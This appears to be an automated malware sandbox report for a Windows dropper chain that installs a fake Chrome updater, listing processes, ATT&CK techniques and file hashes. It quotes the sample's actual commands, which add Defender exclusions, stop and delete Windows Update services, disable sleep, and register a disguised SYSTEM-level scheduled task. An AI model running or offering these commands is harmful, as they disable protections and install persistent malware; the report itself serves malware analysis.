1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
4⤵
- Creates scheduled task(s)
PID:4304

C:\Users\Admin\AppData\Local\Temp\setup32.exe
"C:\Users\Admin\AppData\Local\Temp\setup32.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:80504

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:2216

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3888

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:3976

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:3256

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:5040

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
5⤵
PID:5060

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
5⤵
PID:3216

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
5⤵
- Modifies security service
PID:3036

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
5⤵
PID:4620

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:4208

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2436

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5100

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
5⤵
PID:1664

C:\Users\Admin\AppData\Local\Temp\setup3221.exe
"C:\Users\Admin\AppData\Local\Temp\setup3221.exe"
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4200

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
4⤵
- Blocklisted process makes network request
PID:4556

C:\Windows\Temp\222.exe
"C:\Windows\Temp\222.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4476

C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
"C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4720

C:\Users\Admin\AppData\Local\Temp\watchdog.exe
"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:80712

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5524

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6492

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:6608

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:6716

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:6744

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:6792

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6848

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:6868

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:6884

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:6904

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:6920

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:6996

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:6504

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:6656

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:6732

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:6776

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:6832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6564

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe ekwaxvtzumfvch
2⤵
PID:7976

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:8040

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:7996

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Modifies data under HKEY_USERS
PID:8084

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe cxfacjpoynzyzzmc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1g/oS7Mgp0E17ll9y0I6gqFt/X0Sayxrm+G3lICBwYbS
2⤵
PID:8132

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
2f72537f636dc6eee43878bc859a4ec0

SHA1
5dcd85434721902b906d4e06907873844760d348

SHA256
39702baf633ce7008b7be66ed67aec862ac6d2b6a4ed975cafaa9e5e6aba2a89

SHA512
675553a3e6f33a2f2e98488ced3e01be15a65ea9b46c4976be590b2683b99162684318d926e5f605d51febbf460f845345968b14786b8b6d199a539439007f43

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
9c38fe09e729953d085f37814fbf684f

SHA1
f4267673a6c483997060c99ed50187235e581807

SHA256
33a51220b94424ad545635954c56fefc305cd560f26544a1995e24d9453cf297

SHA512
4005485a854fcb2c10ca2d136b8430b6c07c45b20d0e3602b8653d27619cfead698290a1eb541e384b1a775f0e1ec2e1a2945809598734bb97d3eaf9d95775b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d0e63fba9e8925ec37cd1f516098832a

SHA1
655f0b14821dd7181248d9fb11d8d4eaa1f3cb71

SHA256
30aab607e69e2510cd426f34156078e74f02401cc403216d707480fe7db1e972

SHA512
58313d8a1165fe78f190f2bcd1f95b8960555bd9ad678b60a34e11a5be990e49c49327610a2f58d5f7c6f6d1bce42255fde9367bdc4ce82002bc455bca64c017

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d5cb8909011f8ba1636c2d9a319ca3dc

SHA1
18a15d665d9379ecc5548e7192286577041ed3d9

SHA256
68ccdbd29c0ea32bfaa13486d22fa01d6ae7e522ad33c432b87d447de8e87529

SHA512
85769c5f509eaa248c29c289bce3d410b15c6cf25676b060adfff90fc81f8ee77dc12cef7ffe3e9164574706c8ebaab5e154dbac473824d69ecc569360b61662

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
c68f85e5147e6960b8d948f4fb1136c0

SHA1
eea8bede7ee96773ef6048a4d2a44ee1f608370a

SHA256
ce87360f0f67ba8a392e9214c89c24976121c803cf4d49825117b0e30e04e97b

SHA512
3b0802e35913adb6158313de922072d35c5c798fc1991e21afee0f0b1fe2430eb1a13a9d6e7cc99d4bb1523005ce36a194ae4dd21e5a887a081ead9f5bb6cc70

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
c68f85e5147e6960b8d948f4fb1136c0

SHA1
eea8bede7ee96773ef6048a4d2a44ee1f608370a

SHA256
ce87360f0f67ba8a392e9214c89c24976121c803cf4d49825117b0e30e04e97b

SHA512
3b0802e35913adb6158313de922072d35c5c798fc1991e21afee0f0b1fe2430eb1a13a9d6e7cc99d4bb1523005ce36a194ae4dd21e5a887a081ead9f5bb6cc70

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
425KB

MD5
7d5590f0f67171470aa09d8a75a02b02

SHA1
6fad57ac11b49e096aac2839880266358e1a12e9

SHA256
d619aeb13fe304255179674c2a593eebf59d485d37bb3121105201536191e706

SHA512
77de0277369e0e2ccdde874ec3b03a501bf0fa3a417e0409a76aa1a96e62c98425f64f4e2d12c95ca21741959769dc64764dd0fc583b0c4fb7ede10a90a2c83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
425KB

MD5
7d5590f0f67171470aa09d8a75a02b02

SHA1
6fad57ac11b49e096aac2839880266358e1a12e9

SHA256
d619aeb13fe304255179674c2a593eebf59d485d37bb3121105201536191e706

SHA512
77de0277369e0e2ccdde874ec3b03a501bf0fa3a417e0409a76aa1a96e62c98425f64f4e2d12c95ca21741959769dc64764dd0fc583b0c4fb7ede10a90a2c83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
e30c4e895f1a8146529aeb49b2f3bba2

SHA1
c40402e1cf7342c8fee841fda4b2ef081be30efe

SHA256
17dfb0bed5a23a4453de08f1a8c4d5379fe62a6281abdbc151b619d958ea0c27

SHA512
52edc92251212c5dc79386ff2a34c530f2c506c0158402b349d12ddc272b9958795c9345ac40c1c9eb8af205cbb4d4208799590f8091307cbf1f285e2d9f97f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
e30c4e895f1a8146529aeb49b2f3bba2

SHA1
c40402e1cf7342c8fee841fda4b2ef081be30efe

SHA256
17dfb0bed5a23a4453de08f1a8c4d5379fe62a6281abdbc151b619d958ea0c27

SHA512
52edc92251212c5dc79386ff2a34c530f2c506c0158402b349d12ddc272b9958795c9345ac40c1c9eb8af205cbb4d4208799590f8091307cbf1f285e2d9f97f5

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Windows\Temp\1.vbs
Filesize
105B

MD5
7402b8035ec1c280ca12067fb48f78cf

SHA1
f53efaa35eca6c64b1a54d250cd644d07269c787

SHA256
6479ad76955df79ac09773987823c4ca59f16db33668dae727d97c05178d2726

SHA512
bb7c9bf83e31de09f483221ee24ca12425c95e4e01005d8473666302e42b3633c974407d1053fd970fb325f1d35529c802486444fe5bc6ca72f024ff8d7d7d0b

Download Submit
C:\Windows\Temp\222.exe
Filesize
163KB

MD5
816ecc60aa759bc30c95d8aaeab2751f

SHA1
45facc187bf263c5fcf17454a0a28ece20ec133e

SHA256
426e4a4c31a394a7324f16c5b5469ef982689521a85156eea24feb50f5aeaf10

SHA512
9462563f1df877b091b90817de780a4e2ad1661ea1318ffa618f5b0dc3b7679c61fd306e2b7a6e17a9e230f9801737e28d386069f54ca67cb6a08d081696255d

Download Submit
C:\Windows\Temp\222.exe
Filesize
163KB

MD5
816ecc60aa759bc30c95d8aaeab2751f

SHA1
45facc187bf263c5fcf17454a0a28ece20ec133e

SHA256
426e4a4c31a394a7324f16c5b5469ef982689521a85156eea24feb50f5aeaf10

SHA512
9462563f1df877b091b90817de780a4e2ad1661ea1318ffa618f5b0dc3b7679c61fd306e2b7a6e17a9e230f9801737e28d386069f54ca67cb6a08d081696255d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
af020d388b760fda6737cfadd3421620

SHA1
ab0501f58086443eb1b10ca708af40162fadce44

SHA256
19ea096c3b0fb0e92bc74edc9447c315bcbe9dc14fcba589618f967258c462e8

SHA512
f06989b085e0baf14b4ce36ef349ef78806133287f7a77a8b9b1edbbc2b5ebdc8a91dafb8ddb19cb0af09c747690ba8e4eaa0a21e826d9a251f5403fe74fd69c

Download Submit
\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
memory/756-1024-0x00007FF9D0D20000-0x00007FF9D0EFB000-memory.dmp

Filesize
1.9MB

Download
memory/756-1500-0x00007FF9D0D20000-0x00007FF9D0EFB000-memory.dmp

Filesize
1.9MB

Download
memory/756-756-0x00007FF78DDA0000-0x00007FF78EA39000-memory.dmp

Filesize
12.6MB

Download
memory/756-757-0x00007FF9D0D20000-0x00007FF9D0EFB000-memory.dmp

Filesize
1.9MB

Download
memory/756-1023-0x00007FF78DDA0000-0x00007FF78EA39000-memory.dmp

Filesize
12.6MB

Download
memory/756-1499-0x00007FF78DDA0000-0x00007FF78EA39000-memory.dmp

Filesize
12.6MB

Download
memory/1664-738-0x0000000000000000-mapping.dmp

Download
memory/2216-677-0x0000000000000000-mapping.dmp

Download
memory/2436-678-0x0000000000000000-mapping.dmp

Download
memory/2740-511-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/2740-119-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/2740-116-0x0000000140003E0C-mapping.dmp

Download
memory/2740-199-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/2740-117-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/2740-118-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/2740-115-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/3036-698-0x0000000000000000-mapping.dmp

Download
memory/3040-685-0x0000000000000000-mapping.dmp

Download
memory/3116-507-0x0000000000000000-mapping.dmp

Download
memory/3216-695-0x0000000000000000-mapping.dmp

Download
memory/3256-686-0x0000000000000000-mapping.dmp

Download
memory/3372-669-0x0000000000000000-mapping.dmp

Download
memory/3564-670-0x0000000000000000-mapping.dmp

Download
memory/3580-164-0x00000000774C0000-0x000000007764E000-memory.dmp

